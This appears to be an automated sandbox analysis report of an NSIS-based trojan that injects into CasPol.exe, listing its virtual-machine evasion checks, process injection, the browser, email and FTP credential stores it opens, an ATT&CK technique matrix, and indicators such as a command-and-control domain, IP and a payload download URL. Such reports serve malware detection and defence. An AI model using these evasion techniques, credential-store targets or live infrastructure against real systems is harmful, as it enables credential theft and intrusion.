            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103465912.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEB
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103876242.00000000006CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4636Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AC02BF rdtsc 0_2_02AC02BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9478Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1DA10C40 sldt word ptr [eax]4_2_1DA10C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeAPI call chain: ExitProcess graph end nodegraph_0-9483
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeAPI call chain: ExitProcess graph end nodegraph_0-9487
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\BorgerdyderneJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\Husvildt\Eliteidrt\RemodifiedJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLINGJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmpJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103465912.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeb
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000004.00000002.5728150845.0000000001635000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1104974887.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1105258151.0000000004759000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, 00000000.00000002.1103876242.00000000006CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 00000004.00000002.5729881456.0000000003209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_70B21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70B21BFF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AD3A08 mov eax, dword ptr fs:[00000030h]0_2_02AD3A08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AD4F37 mov eax, dword ptr fs:[00000030h]0_2_02AD4F37
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02ACB16D mov eax, dword ptr fs:[00000030h]0_2_02ACB16D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20AD8B90 LdrInitializeThunk,4_2_20AD8B90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1390000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4372, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara match | File source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4372, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4372, type: MEMORYSTR
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | 211 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
            Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Obfuscated Files or Information | 1 Credentials in Registry | 117 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | 111 Process Injection | 1 DLL Side-Loading | Security Account Manager | 331 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | 1 Registry Run Keys / Startup Folder | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 251 Virtualization/Sandbox Evasion | LSA Secrets | 251 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | 123 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | 111 Process Injection | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            [Behavior Graph] ID: 659406, Sample: SecuriteInfo.com.Gen.Varian..., Startdate: 08/07/2022, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label
            SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe | 22% | ReversingLabs | Win32.Trojan.Nemesis

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll | 3% | Metadefender |
            C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll | 0% | ReversingLabs |

            No Antivirus matches

            Source | Detection | Scanner | Label
            gonzalezestalote.com | 0% | Virustotal |
            x1.i.lencr.org | 0% | Virustotal |

            Source | Detection | Scanner | Label
            http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
            http://x1.i.lencr.org/ | 0% | Avira URL Cloud | safe
            http://HtsTzf40dpytHYvq.orgt- | 0% | Avira URL Cloud | safe
            http://cps.letsencrypt.org0 | 0% | Avira URL Cloud | safe
            http://HtsTzf40dpytHYvq.org | 0% | Avira URL Cloud | safe
            http://x1.i.lencr.org:80/ | 0% | Avira URL Cloud | safe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe
            http://mail.gonzalezestalote.com | 0% | Avira URL Cloud | safe
            http://HtsTzf40dpytHYvq.org0=5 | 0% | Avira URL Cloud | safe
            http://UUaKae.com | 0% | Avira URL Cloud | safe
            http://r3.i.lencr.org/0 | 0% | Avira URL Cloud | safe
            http://x1.c.lencr.org/0 | 0% | Avira URL Cloud | safe
            http://x1.i.lencr.org/0 | 0% | Avira URL Cloud | safe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe
            https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external | 0% | Avira URL Cloud | safe
            http://r3.o.lencr.org0 | 0% | Avira URL Cloud | safe
            http://gonzalezestalote.com | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            drive.google.com | 142.250.186.78 | true | false | | high
            gonzalezestalote.com | 185.101.224.45 | true | false | | unknown
            googlehosted.l.googleusercontent.com | 142.250.185.225 | true | false | | high
            doc-0k-0s-docs.googleusercontent.com | unknown | unknown | false | | high
            x1.i.lencr.org | unknown | unknown | false | | unknown
            mail.gonzalezestalote.com | unknown | unknown | false | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            https://doc-0k-0s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e | false | | high
                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      142.250.186.78 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                      185.101.224.45 | gonzalezestalote.com | Spain | 56732 | HOSTINET_ASES | false
                                      142.250.185.225 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
                                      Joe Sandbox Version: 35.0.0 Citrine
                                      Analysis ID: 659406
                                      Start date and time: 08/07/2022 05:58:16 (2022-07-08 05:58:16 +02:00)
                                      Joe Sandbox Product: CloudBasic
                                      Overall analysis duration: 0h 14m 17s
                                      Hypervisor based Inspection enabled: false
                                      Report type: full
                                      Sample file name: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                      Cookbook file name: default.jbs
                                      Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name: Suspected Instruction Hammering
                                      Number of analysed new started processes analysed: 40
                                      Number of new started drivers analysed: 0
                                      Number of existing processes analysed: 0
                                      Number of existing drivers analysed: 0
                                      Number of injected processes analysed: 0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode: default
                                      Analysis stop reason: Timeout
                                      Detection: MAL
                                      Classification: mal100.troj.spyw.evad.winEXE@6/11@4/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 22.9% (good quality ratio 22.5%)
                                      • Quality average: 88.3%
                                      • Quality standard deviation: 21.1%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 140
                                      • Number of non-executed functions: 45
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.5.88, 20.82.19.171, 104.117.200.9, 209.197.3.8, 93.184.221.240
                                      • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e-0009.e-msedge.net, arc.msn.com, wu.azureedge.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, img-prod-cms-rt-microsoft-com.akamaized.net, crl.root-x1.letsencrypt.org.edgekey.net, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wd-prod-cp.trafficmanager.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, evoke-windowsservices-tas.msedge.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com
                                      • Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      Time | Type | Description
                                      06:00:59 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe modified
                                      06:01:42 | API Interceptor | 2691x Sleep call for process: CasPol.exe modified
                                      Match | Associated Sample Name / URL | Detection | Context
                                      185.101.224.45 | SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe | malicious |
                                      185.101.224.45 | SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe | malicious |
                                      185.101.224.45 | Justificante de Transferencia.exe | malicious |
                                      185.101.224.45 | JUSTIFICANTE 0099A435.exe | malicious |
                                      185.101.224.45 | PEDIDO N#U00ba 66552022 de fecha 16-06-2022.exe | malicious |
                                      185.101.224.45 | Banco BPI Comprovativo de Transfer#U00eancia.exe | malicious |
                                      185.101.224.45 | JUSTIFICANTE DE PAGO.pdf.vbs | malicious |
                                      185.101.224.45 | JUSTIFICANTE DE PAGO.txt.vbs | malicious |
                                      185.101.224.45 | 000224_G991DF982E4A4914AA972EC0657DE68F.exe | malicious |
                                      185.101.224.45 | SecuriteInfo.com.Trojan.Win32.NSISInject.FC.MTB.3347.exe | malicious |
                                      185.101.224.45 | SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.7525.exe | malicious |
                                      185.101.224.45 | Justificante de Transferencia.exe | malicious |
                                      185.101.224.45 | SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.12599.exe | malicious |
                                      185.101.224.45 | SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.6220.exe | malicious |
                                      185.101.224.45 | SecuriteInfo.com.W32.Ninjector.CM.genEldorado.14602.exe | malicious |
                                      185.101.224.45 | side.exe | malicious |
                                      185.101.224.45 | Facturas DHL Parcel 46_008125.exe | malicious |
                                      185.101.224.45 | Facturas DHL Parcel 46_008125.exe | malicious |
                                      185.101.224.45 | BBVA-Confirming Facturas Pagadas al Vencimiento.exe | malicious |
                                      185.101.224.45 | ComprovativoExecu#U00e7#U00e3oTransfer#U00eancia.exe | malicious |
                                      Match | Associated Sample Name / URL | Detection | Context
                                      HOSTINET_ASES | SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | Justificante de Transferencia.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | JUSTIFICANTE 0099A435.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | PEDIDO N#U00ba 66552022 de fecha 16-06-2022.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | Banco BPI Comprovativo de Transfer#U00eancia.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | JUSTIFICANTE DE PAGO.pdf.vbs | malicious | 185.101.224.45
                                      HOSTINET_ASES | JUSTIFICANTE DE PAGO.txt.vbs | malicious | 185.101.224.45
                                      HOSTINET_ASES | 000224_G991DF982E4A4914AA972EC0657DE68F.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | SecuriteInfo.com.Trojan.Win32.NSISInject.FC.MTB.3347.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.7525.exe | malicious | 185.101.224.45
